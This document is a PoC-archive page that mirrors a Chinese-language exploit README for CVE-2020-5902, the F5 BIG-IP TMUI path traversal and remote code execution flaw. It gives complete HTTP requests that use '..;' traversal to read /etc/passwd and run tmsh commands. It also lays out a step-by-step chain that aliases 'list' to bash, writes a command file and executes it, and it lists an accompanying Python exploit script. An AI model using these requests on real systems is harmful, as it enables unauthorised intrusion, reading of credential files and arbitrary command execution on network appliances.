Associated Vulnerability
Title:F5 BIG-IP 路径遍历漏洞 (CVE-2020-5902)Description:In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
Readme
# CVE-2020-5902_RCE_EXP
Blog:[http://www.svenbeast.com/post/cve-2020-5902](http://www.svenbeast.com/post/cve-2020-5902-big-ip-rce-rao-guo-tmsh-xian-zhi-ming-ling-zhi-xing-andexp-bian/)
### Read File
Example: https://x.x.x.x/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
```
GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ar;q=0.8
Cookie: JSESSIONID=89E562018185E75966F67E7FC50CF6E1
```
### F5 RCE
Example: https://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user
```
GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ar;q=0.8
Cookie: JSESSIONID=07E7975B5F6F4B43F3375AA5FFB32628
```
### RCE
* 1. 修改alias ,将list设置成bash命令
```
htts://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
```
* 2. 生成bash文件并写入要执行的命令
```
htts://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/checksafe&content=whoami
```
* 3. 执行bash文件
```
htts://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/checksafe
```
* 4. 还原alias设置,防止影响目标正常使用
```
https://x.x.x.x/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list
```
### 参考链接
https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4
https://github.com/jas502n/CVE-2020-5902
File Snapshot
[4.0K] /data/pocs/b32745155a96bd716f6f5a90e70784ab5f1867d6
├── [2.4K] CVE-2020-5902_RCE.py
├── [358K] list.png
├── [239K] rce1.png
├── [526K] ReadFile.png
├── [2.6K] README.md
└── [196K] result.png
0 directories, 6 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →